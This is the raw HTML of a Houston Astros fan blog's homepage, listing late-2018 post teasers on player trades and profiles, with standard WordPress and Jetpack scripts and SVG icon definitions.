data-large-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/11/pax.jpg?fit=723%2C355&amp;ssl=1" /> </a> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://history-earned.com/2018/11/20/thoughts-on-the-james-paxton-trade-and-how-it-affects-the-astros/" rel="bookmark"><time class="entry-date published updated" datetime="2018-11-20T16:57:55+00:00">November 20, 2018</time></a></span><span class="byline"> <span class="author vcard"><a class="url fn n" href="https://history-earned.com/author/crperry13/">Chris Perry</a></span></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://history-earned.com/2018/11/20/thoughts-on-the-james-paxton-trade-and-how-it-affects-the-astros/" rel="bookmark">Thoughts on the James Paxton trade and how it affects the Astros</a></h2> </header><!-- .entry-header --> </article><!-- #post-## --> <article id="post-802" class="post-802 post type-post status-publish format-standard has-post-thumbnail hentry category-player-profiles category-transactions tag-aledmys-diaz tag-astros tag-blue-jays tag-marwin-gonzalez"> <a class="entry-thumbnail apostrophe-2-thumb" href="https://history-earned.com/2018/11/17/astros-trade-for-ss-3b-aledmys-diaz/"> <img width="450" height="379" src="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/11/aledmys.jpg?resize=450%2C379&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" data-attachment-id="803" data-permalink="https://history-earned.com/2018/11/17/astros-trade-for-ss-3b-aledmys-diaz/aledmys/" data-orig-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/11/aledmys.jpg?fit=799%2C379&amp;ssl=1" data-orig-size="799,379" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="aledmys" data-image-description="" data-medium-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/11/aledmys.jpg?fit=300%2C142&amp;ssl=1" data-large-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/11/aledmys.jpg?fit=723%2C343&amp;ssl=1" /> </a> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://history-earned.com/2018/11/17/astros-trade-for-ss-3b-aledmys-diaz/" rel="bookmark"><time class="entry-date published updated" datetime="2018-11-17T17:26:05+00:00">November 17, 2018</time></a></span><span class="byline"> <span class="author vcard"><a class="url fn n" href="https://history-earned.com/author/crperry13/">Chris Perry</a></span></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://history-earned.com/2018/11/17/astros-trade-for-ss-3b-aledmys-diaz/" rel="bookmark">Astros trade for SS/3B Aledmys Diaz</a></h2> </header><!-- .entry-header --> </article><!-- #post-## --> <article id="post-794" class="post-794 post type-post status-publish format-standard hentry category-uncategorized"> <a class="entry-thumbnail apostrophe-2-nothumb" href="https://history-earned.com/2018/11/12/some-random-astros-off-season-thoughts/"> <span></span> </a> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://history-earned.com/2018/11/12/some-random-astros-off-season-thoughts/" rel="bookmark"><time class="entry-date published" datetime="2018-11-12T02:10:09+00:00">November 12, 2018</time><time class="updated" datetime="2018-11-12T02:14:19+00:00">November 12, 2018</time></a></span><span class="byline"> <span class="author vcard"><a class="url fn n" href="https://history-earned.com/author/crperry13/">Chris Perry</a></span></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://history-earned.com/2018/11/12/some-random-astros-off-season-thoughts/" rel="bookmark">Some random Astros off-season thoughts</a></h2> </header><!-- .entry-header --> </article><!-- #post-## --> <article id="post-773" class="post-773 post type-post status-publish format-standard has-post-thumbnail hentry category-farm category-greatest-hits category-nerdy category-player-profiles category-transactions category-uncategorized tag-altuve tag-archer tag-astros tag-baseball tag-bregman tag-cole tag-correa tag-grandal tag-gurriel tag-houston tag-kemp tag-keuchel tag-marisnick tag-marwin tag-mccullers tag-mchugh tag-morton tag-reddick tag-springer tag-stassi tag-verlander tag-white"> <a class="entry-thumbnail apostrophe-2-thumb" href="https://history-earned.com/2018/10/29/the-one-stop-shop-for-astros-2019-off-season-info-word-count-7015/"> <img width="450" height="379" src="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/10/bregs.jpg?resize=450%2C379&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" data-attachment-id="780" data-permalink="https://history-earned.com/2018/10/29/the-one-stop-shop-for-astros-2019-off-season-info-word-count-7015/bregs/" data-orig-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/10/bregs.jpg?fit=873%2C379&amp;ssl=1" data-orig-size="873,379" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="bregs" data-image-description="" data-medium-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/10/bregs.jpg?fit=300%2C130&amp;ssl=1" data-large-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/10/bregs.jpg?fit=723%2C314&amp;ssl=1" /> </a> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://history-earned.com/2018/10/29/the-one-stop-shop-for-astros-2019-off-season-info-word-count-7015/" rel="bookmark"><time class="entry-date published" datetime="2018-10-29T01:14:51+00:00">October 29, 2018</time><time class="updated" datetime="2018-10-29T14:45:49+00:00">October 29, 2018</time></a></span><span class="byline"> <span class="author vcard"><a class="url fn n" href="https://history-earned.com/author/crperry13/">Chris Perry</a></span></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://history-earned.com/2018/10/29/the-one-stop-shop-for-astros-2019-off-season-info-word-count-7015/" rel="bookmark">The one-stop shop for Astros 2019 off-season info! (Word count: 7,015)</a></h2> </header><!-- .entry-header --> </article><!-- #post-## --> <article id="post-762" class="post-762 post type-post status-publish format-standard has-post-thumbnail hentry category-player-profiles tag-astros tag-dallas-keuchel tag-houston tag-mlb"> <a class="entry-thumbnail apostrophe-2-thumb" href="https://history-earned.com/2018/10/11/i-bet-you-havent-seen-this-image-of-dallas-keuchel/"> <img width="450" height="450" src="https://i0.wp.com/history-earned.com/wp-content/uploads/2018/10/imgonline-com-ua-twotoone-NZEKVNxuN4OJl7.jpg?resize=450%2C450&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" data-attachment-id="765" data-permalink="https://history-earned.com/2018/10/11/i-bet-you-havent-seen-this-image-of-dallas-keuchel/imgonline-com-ua-twotoone-nzekvnxun4ojl7/" data-orig-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2018/10/imgonline-com-ua-twotoone-NZEKVNxuN4OJl7.jpg?fit=1311%2C511&amp;ssl=1" data-orig-size="1311,511" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="imgonline-com-ua-twotoone-NZEKVNxuN4OJl7" data-image-description="" data-medium-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2018/10/imgonline-com-ua-twotoone-NZEKVNxuN4OJl7.jpg?fit=300%2C117&amp;ssl=1" data-large-file="https://i0.wp.com/history-earned.com/wp-content/uploads/2018/10/imgonline-com-ua-twotoone-NZEKVNxuN4OJl7.jpg?fit=723%2C282&amp;ssl=1" /> </a> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://history-earned.com/2018/10/11/i-bet-you-havent-seen-this-image-of-dallas-keuchel/" rel="bookmark"><time class="entry-date published updated" datetime="2018-10-11T13:50:50+00:00">October 11, 2018</time></a></span><span class="byline"> <span class="author vcard"><a class="url fn n" href="https://history-earned.com/author/edwardsantosgarza/">Edward Santos Garza</a></span></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://history-earned.com/2018/10/11/i-bet-you-havent-seen-this-image-of-dallas-keuchel/" rel="bookmark">I Bet You Haven&#8217;t Seen This Image of Dallas Keuchel</a></h2> </header><!-- .entry-header --> </article><!-- #post-## --> <article id="post-744" class="post-744 post type-post status-publish format-standard has-post-thumbnail hentry category-player-profiles tag-astros tag-houston tag-mlb tag-tyler-white"> <a class="entry-thumbnail apostrophe-2-thumb" href="https://history-earned.com/2018/10/09/approbation-for-tyler-white/"> <img width="450" height="415" src="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/10/white.jpg?resize=450%2C415&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" data-attachment-id="745" data-permalink="https://history-earned.com/2018/10/09/approbation-for-tyler-white/white-3/" data-orig-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/10/white.jpg?fit=755%2C415&amp;ssl=1" data-orig-size="755,415" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="white" data-image-description="" data-medium-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/10/white.jpg?fit=300%2C165&amp;ssl=1" data-large-file="https://i1.wp.com/history-earned.com/wp-content/uploads/2018/10/white.jpg?fit=723%2C397&amp;ssl=1" /> </a> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://history-earned.com/2018/10/09/approbation-for-tyler-white/" rel="bookmark"><time class="entry-date published" datetime="2018-10-09T17:28:56+00:00">October 9, 2018</time><time class="updated" datetime="2018-10-09T17:32:56+00:00">October 9, 2018</time></a></span><span class="byline"> <span class="author vcard"><a class="url fn n" href="https://history-earned.com/author/crperry13/">Chris Perry</a></span></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://history-earned.com/2018/10/09/approbation-for-tyler-white/" rel="bookmark">Approbation for Tyler White</a></h2> </header><!-- .entry-header --> </article><!-- #post-## --> </div><!-- #posts-wrapper --> </main><!-- #main --> <nav class="navigation posts-navigation" role="navigation"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><div class="nav-previous"><a href="https://history-earned.com/page/2/" >Older posts</a></div></div> </nav> </section><!-- #primary --> <div id="secondary" class="widget-area" role="complementary"> <div class="sidebar-primary"> <aside id="text-3" class="widget widget_text"> <div class="textwidget"><p><a href="https://join.slack.com/t/astrostalk/shared_invite/enQtMzIwNDQzMDYyMzU3LWQwNTczZTcxODk4NzZhZDQxOWY4MDU5ODViN2Y2MjEyZjQzYjM5OTAyZWZkNDBiMmI3MWJhNjVhZWY1NmNmYjY"><strong>Join our Slack community!</strong><br /> </a>Over 245 members!</p> </div> </aside><aside id="twitter_timeline-3" class="widget widget_twitter_timeline"><h2 class="widget-title">Follow on Twitter</h2><a class="twitter-timeline" data-theme="light" data-link-color="#f96e5b" data-border-color="#e8e8e8" data-tweet-limit="1" data-lang="EN" data-partner="jetpack" href="https://twitter.com/@HistoryEarned" href="https://twitter.com/@HistoryEarned">My Tweets</a></aside><aside id="rss_links-3" class="widget widget_rss_links"><h2 class="widget-title">HistoryEarned</h2><ul><li><a target="_self" href="https://history-earned.com/feed/" title="Subscribe to Posts">RSS - Posts</a></li></ul> </aside><aside id="search-1" class="widget widget_search"><form role="search" method="get" class="search-form" action="https://history-earned.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></aside><aside id="text-5" class="widget widget_text"><h2 class="widget-title">Other Indy Astros Fan Links</h2> <div class="textwidget"><p><a href="http://www.astrosfuture.com/">Astros Future</a></p> <p><a href="https://www.facebook.com/groups/HoustonAstrosNation/">Houston Astros Nation</a></p> <p><a href="http://www.astroscounty.com/">Astros County</a></p> <p><a href="https://whattheheckbobby.blogspot.com/">What the Heck, Bobby?</a></p> <p><a href="https://chipalatta.com/">Chipalatta</a></p> </div> </aside> </div> </div><!-- #secondary --> </div><!-- #content --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="widget-area"> <div id="footer-sidebar"> <aside id="jetpack_widget_social_icons-3" class="widget jetpack_widget_social_icons"><h3 class="widget-title">Follow Us</h3> <ul class="jetpack-social-widget-list size-medium"> <li class="jetpack-social-widget-item"> <a href="https://twitter.com/HistoryEarned" target="_self"> <span class="screen-reader-text">Twitter</span><svg class="icon icon-twitter" aria-hidden="true" role="img"> <use href="#icon-twitter" xlink:href="#icon-twitter"></use> </svg> </a> </li> <li class="jetpack-social-widget-item"> <a href="https://historyearned.wordpress.com/feed/?customize_changeset_uuid=c8d6f90b-2c56-4bc9-a6ad-5ce878407e03&#038;customize_autosaved=on&#038;customize_messenger_channel=preview-1" target="_self"> <span class="screen-reader-text">RSS Feed</span><svg class="icon icon-feed" aria-hidden="true" role="img"> <use href="#icon-feed" xlink:href="#icon-feed"></use> </svg> </a> </li> <li class="jetpack-social-widget-item"> <a href="https://join.slack.com/t/astrostalk/shared_invite/enQtMzIwNDQzMDYyMzU3LWQwNTczZTcxODk4NzZhZDQxOWY4MDU5ODViN2Y2MjEyZjQzYjM5OTAyZWZkNDBiMmI3MWJhNjVhZWY1NmNmYjY" target="_self"> <svg class="icon icon-chain" aria-hidden="true" role="img"> <use href="#icon-chain" xlink:href="#icon-chain"></use> </svg> </a> </li> </ul> </aside> </div> </div> <div class="site-info"> <a href="https://wordpress.com/?ref=footer_custom_powered">Powered by WordPress.com</a>. </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <script type="text/javascript"> //<![CDATA[ var infiniteScroll = JSON.parse( decodeURIComponent( '%7B%22settings%22%3A%7B%22id%22%3A%22posts-wrapper%22%2C%22ajaxurl%22%3A%22https%3A%5C%2F%5C%2Fhistory-earned.com%5C%2F%3Finfinity%3Dscrolling%22%2C%22type%22%3A%22scroll%22%2C%22wrapper%22%3Afalse%2C%22wrapper_class%22%3A%22infinite-wrap%22%2C%22footer%22%3A%22colophon%22%2C%22click_handle%22%3A%221%22%2C%22text%22%3A%22Older%20posts%22%2C%22totop%22%3A%22Scroll%20back%20to%20top%22%2C%22currentday%22%3A%2209.10.18%22%2C%22order%22%3A%22DESC%22%2C%22scripts%22%3A%5B%5D%2C%22styles%22%3A%5B%5D%2C%22google_analytics%22%3Afalse%2C%22offset%22%3A1%2C%22history%22%3A%7B%22host%22%3A%22history-earned.com%22%2C%22path%22%3A%22%5C%2Fpage%5C%2F%25d%5C%2F%22%2C%22use_trailing_slashes%22%3Atrue%2C%22parameters%22%3A%22%22%7D%2C%22query_args%22%3A%7B%22error%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A0%2C%22post_parent%22%3A%22%22%2C%22subpost%22%3A%22%22%2C%22subpost_id%22%3A%22%22%2C%22attachment%22%3A%22%22%2C%22attachment_id%22%3A0%2C%22name%22%3A%22%22%2C%22static%22%3A%22%22%2C%22pagename%22%3A%22%22%2C%22page_id%22%3A0%2C%22second%22%3A%22%22%2C%22minute%22%3A%22%22%2C%22hour%22%3A%22%22%2C%22day%22%3A0%2C%22monthnum%22%3A0%2C%22year%22%3A0%2C%22w%22%3A0%2C%22category_name%22%3A%22%22%2C%22tag%22%3A%22%22%2C%22cat%22%3A%22%22%2C%22tag_id%22%3A%22%22%2C%22author%22%3A%22%22%2C%22author_name%22%3A%22%22%2C%22feed%22%3A%22%22%2C%22tb%22%3A%22%22%2C%22paged%22%3A0%2C%22meta_key%22%3A%22%22%2C%22meta_value%22%3A%22%22%2C%22preview%22%3A%22%22%2C%22s%22%3A%22%22%2C%22sentence%22%3A%22%22%2C%22title%22%3A%22%22%2C%22fields%22%3A%22%22%2C%22menu_order%22%3A%22%22%2C%22embed%22%3A%22%22%2C%22category__in%22%3A%5B%5D%2C%22category__not_in%22%3A%5B%5D%2C%22category__and%22%3A%5B%5D%2C%22post__in%22%3A%5B%5D%2C%22post__not_in%22%3A%5B%5D%2C%22post_name__in%22%3A%5B%5D%2C%22tag__in%22%3A%5B%5D%2C%22tag__not_in%22%3A%5B%5D%2C%22tag__and%22%3A%5B%5D%2C%22tag_slug__in%22%3A%5B%5D%2C%22tag_slug__and%22%3A%5B%5D%2C%22post_parent__in%22%3A%5B%5D%2C%22post_parent__not_in%22%3A%5B%5D%2C%22author__in%22%3A%5B%5D%2C%22author__not_in%22%3A%5B%5D%2C%22posts_per_page%22%3A10%2C%22ignore_sticky_posts%22%3Afalse%2C%22suppress_filters%22%3Afalse%2C%22cache_results%22%3Afalse%2C%22update_post_term_cache%22%3Atrue%2C%22lazy_load_term_meta%22%3Atrue%2C%22update_post_meta_cache%22%3Atrue%2C%22post_type%22%3A%22%22%2C%22nopaging%22%3Afalse%2C%22comments_per_page%22%3A%2250%22%2C%22no_found_rows%22%3Afalse%2C%22order%22%3A%22DESC%22%7D%2C%22query_before%22%3A%222019-05-16%2016%3A08%3A38%22%2C%22last_post_date%22%3A%222018-10-09%2017%3A28%3A56%22%2C%22body_class%22%3A%22infinite-scroll%20neverending%22%2C%22stats%22%3A%22blog%3D143214097%26host%3Dhistory-earned.com%26v%3Dext%26j%3D1%3A7.3.1%26x_pagetype%3Dinfinite-jetpack%22%7D%7D' ) ); //]]> </script> <!-- --> <!-- Your Google Analytics Plugin is missing the tracking ID --> <div id="infinite-footer"> <div class="container"> <div class="blog-info"> <a id="infinity-blog-title" href="https://history-earned.com/" rel="home"> History Earned: a blog about the Astros </a> </div> <div class="blog-credits"> <a href="https://wordpress.org/" rel="noopener noreferrer" target="_blank" rel="generator">Proudly powered by WordPress</a> Theme: Apostrophe 2. </div> </div> </div><!-- #infinite-footer --> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/infinite-scroll/infinity.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/photon/photon.min.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/history-earned.com\/wp-admin\/admin-ajax.php","nonce":"cef784045e","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"0","login_url":"https:\/\/history-earned.com\/wp-login.php?redirect_to=https%3A%2F%2Fhistory-earned.com%2F2019%2F03%2F14%2Fbehind-the-curtain-the-astros-front-offices-fearsome-reputation%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/carousel/jetpack-carousel.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/wp-mediaelement.min.js'></script> <script type='text/javascript' src='https://history-earned.com/wp-content/themes/apostrophe-2/js/skip-link-focus-fix.js?ver=20150605'></script> <script type='text/javascript'> /* <![CDATA[ */ var screenReaderText = {"expand":"expand child menu","collapse":"collapse child menu"}; /* ]]> */ </script> <script type='text/javascript' src='https://history-earned.com/wp-content/themes/apostrophe-2/js/navigation.js?ver=20161104'></script> <script type='text/javascript' src='https://history-earned.com/wp-content/themes/apostrophe-2/js/apostrophe.js?ver=20150226'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/twitter-timeline.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/wp-embed.min.js'></script> <script type="text/javascript"> jQuery.extend( infiniteScroll.settings.scripts, ["jquery-core","jquery-migrate","jquery","spin","jquery.spin","tiled-gallery","mediaelement-core","mediaelement-migrate","mediaelement","the-neverending-homepage","jetpack-photon","devicepx","jetpack-carousel","wp-mediaelement","apostrophe-2-skip-link-focus-fix","apostrophe-2-navigation","apostrophe-2","jetpack-twitter-timeline","wp-embed"] ); jQuery.extend( infiniteScroll.settings.styles, ["the-neverending-homepage","wp-block-library","wpcom-text-widget-styles","jetpack_likes","jetpack-carousel","tiled-gallery","mediaelement","wp-mediaelement","apostrophe-2-blocks","apostrophe-2-style","genericons","apostrophe-2-fonts","apostrophe-2-wpcom","jetpack-social-menu","jetpack-widget-social-icons-styles","jetpack_css"] ); </script><script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'143214097',post:'0',tz:'0',srv:'history-earned.com'} ]); _stq.push([ 'clickTrackerInit', '143214097', '0' ]); </script> <svg style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <defs> <symbol id="icon-500px" viewBox="0 0 24 24"> <path d="M6.94026,15.1412c.00437.01213.108.29862.168.44064a6.55008,6.55008,0,1,0,6.03191-9.09557,6.68654,6.68654,0,0,0-2.58357.51467A8.53914,8.53914,0,0,0,8.21268,8.61344L8.209,8.61725V3.22948l9.0504-.00008c.32934-.0036.32934-.46353.32934-.61466s0-.61091-.33035-.61467L7.47248,2a.43.43,0,0,0-.43131.42692v7.58355c0,.24466.30476.42131.58793.4819.553.11812.68074-.05864.81617-.2457l.018-.02481A10.52673,10.52673,0,0,1,9.32258,9.258a5.35268,5.35268,0,1,1,7.58985,7.54976,5.417,5.417,0,0,1-3.80867,1.56365,5.17483,5.17483,0,0,1-2.69822-.74478l.00342-4.61111a2.79372,2.79372,0,0,1,.71372-1.78792,2.61611,2.61611,0,0,1,1.98282-.89477,2.75683,2.75683,0,0,1,1.95525.79477,2.66867,2.66867,0,0,1,.79656,1.909,2.724,2.724,0,0,1-2.75849,2.748,4.94651,4.94651,0,0,1-.86254-.13719c-.31234-.093-.44519.34058-.48892.48349-.16811.54966.08453.65862.13687.67489a3.75751,3.75751,0,0,0,1.25234.18375,3.94634,3.94634,0,1,0-2.82444-6.742,3.67478,3.67478,0,0,0-1.13028,2.584l-.00041.02323c-.0035.11667-.00579,2.881-.00644,3.78811l-.00407-.00451a6.18521,6.18521,0,0,1-1.0851-1.86092c-.10544-.27856-.34358-.22925-.66857-.12917-.14192.04372-.57386.17677-.47833.489Zm4.65165-1.08338a.51346.51346,0,0,0,.19513.31818l.02276.022a.52945.52945,0,0,0,.3517.18416.24242.24242,0,0,0,.16577-.0611c.05473-.05082.67382-.67812.73287-.738l.69041.68819a.28978.28978,0,0,0,.21437.11032.53239.53239,0,0,0,.35708-.19486c.29792-.30419.14885-.46821.07676-.54751l-.69954-.69975.72952-.73469c.16-.17311.01874-.35708-.12218-.498-.20461-.20461-.402-.25742-.52855-.14083l-.7254.72665-.73354-.73375a.20128.20128,0,0,0-.14179-.05695.54135.54135,0,0,0-.34379.19648c-.22561.22555-.274.38149-.15656.5059l.73374.7315-.72942.73072A.26589.26589,0,0,0,11.59191,14.05782Zm1.59866-9.915A8.86081,8.86081,0,0,0,9.854,4.776a.26169.26169,0,0,0-.16938.22759.92978.92978,0,0,0,.08619.42094c.05682.14524.20779.531.50006.41955a8.40969,8.40969,0,0,1,2.91968-.55484,7.87875,7.87875,0,0,1,3.086.62286,8.61817,8.61817,0,0,1,2.30562,1.49315.2781.2781,0,0,0,.18318.07586c.15529,0,.30425-.15253.43167-.29551.21268-.23861.35873-.4369.1492-.63538a8.50425,8.50425,0,0,0-2.62312-1.694A9.0177,9.0177,0,0,0,13.19058,4.14283ZM19.50945,18.6236h0a.93171.93171,0,0,0-.36642-.25406.26589.26589,0,0,0-.27613.06613l-.06943.06929A7.90606,7.90606,0,0,1,7.60639,18.505a7.57284,7.57284,0,0,1-1.696-2.51537,8.58715,8.58715,0,0,1-.5147-1.77754l-.00871-.04864c-.04939-.25873-.28755-.27684-.62981-.22448-.14234.02178-.5755.088-.53426.39969l.001.00712a9.08807,9.08807,0,0,0,15.406,4.99094c.00193-.00192.04753-.04718.0725-.07436C19.79425,19.16234,19.87422,18.98728,19.50945,18.6236Z"/> </symbol> <symbol id="icon-amazon" viewBox="0 0 24 24"> <path d="M13.582,8.182C11.934,8.367,9.78,8.49,8.238,9.166c-1.781,0.769-3.03,2.337-3.03,4.644 c0,2.953,1.86,4.429,4.253,4.429c2.02,0,3.125-0.477,4.685-2.065c0.516,0.747,0.685,1.109,1.629,1.894 c0.212,0.114,0.483,0.103,0.672-0.066l0.006,0.006c0.567-0.505,1.599-1.401,2.18-1.888c0.231-0.188,0.19-0.496,0.009-0.754 c-0.52-0.718-1.072-1.303-1.072-2.634V8.305c0-1.876,0.133-3.599-1.249-4.891C15.23,2.369,13.422,2,12.04,2 C9.336,2,6.318,3.01,5.686,6.351C5.618,6.706,5.877,6.893,6.109,6.945l2.754,0.298C9.121,7.23,9.308,6.977,9.357,6.72 c0.236-1.151,1.2-1.706,2.284-1.706c0.584,0,1.249,0.215,1.595,0.738c0.398,0.584,0.346,1.384,0.346,2.061V8.182z M13.049,14.088 c-0.451,0.8-1.169,1.291-1.967,1.291c-1.09,0-1.728-0.83-1.728-2.061c0-2.42,2.171-2.86,4.227-2.86v0.615 C13.582,12.181,13.608,13.104,13.049,14.088z M20.683,19.339C18.329,21.076,14.917,22,11.979,22c-4.118,0-7.826-1.522-10.632-4.057 c-0.22-0.199-0.024-0.471,0.241-0.317c3.027,1.762,6.771,2.823,10.639,2.823c2.608,0,5.476-0.541,8.115-1.66 C20.739,18.62,21.072,19.051,20.683,19.339z M21.336,21.043c-0.194,0.163-0.379,0.076-0.293-0.139 c0.284-0.71,0.92-2.298,0.619-2.684c-0.301-0.386-1.99-0.183-2.749-0.092c-0.23,0.027-0.266-0.173-0.059-0.319 c1.348-0.946,3.555-0.673,3.811-0.356C22.925,17.773,22.599,19.986,21.336,21.043z"/> </symbol> <symbol id="icon-apple" viewBox="0 0 24 24"> <path d="M20.07,17.586a10.874,10.874,0,0,1-1.075,1.933,9.822,9.822,0,0,1-1.385,1.674,2.687,2.687,0,0,1-1.78.784,4.462,4.462,0,0,1-1.644-.393,4.718,4.718,0,0,0-1.77-.391,4.878,4.878,0,0,0-1.82.391A4.9,4.9,0,0,1,9.021,22a2.53,2.53,0,0,1-1.82-.8A10.314,10.314,0,0,1,5.752,19.46,11.987,11.987,0,0,1,4.22,16.417a11.143,11.143,0,0,1-.643-3.627,6.623,6.623,0,0,1,.87-3.465A5.1,5.1,0,0,1,6.268,7.483a4.9,4.9,0,0,1,2.463-.695,5.8,5.8,0,0,1,1.9.443,6.123,6.123,0,0,0,1.511.444,9.04,9.04,0,0,0,1.675-.523,5.537,5.537,0,0,1,2.277-.4,4.835,4.835,0,0,1,3.788,1.994,4.213,4.213,0,0,0-2.235,3.827,4.222,4.222,0,0,0,1.386,3.181,4.556,4.556,0,0,0,1.385.909q-.167.483-.353.927ZM16.211,2.4a4.267,4.267,0,0,1-1.094,2.8,3.726,3.726,0,0,1-3.1,1.528A3.114,3.114,0,0,1,12,6.347a4.384,4.384,0,0,1,1.16-2.828,4.467,4.467,0,0,1,1.414-1.061A4.215,4.215,0,0,1,16.19,2a3.633,3.633,0,0,1,.021.4Z"/> </symbol> <symbol id="icon-bandcamp" viewBox="0 0 24 24"> <path d="M15.27 17.289 3 17.289 8.73 6.711 21 6.711 15.27 17.289"/> 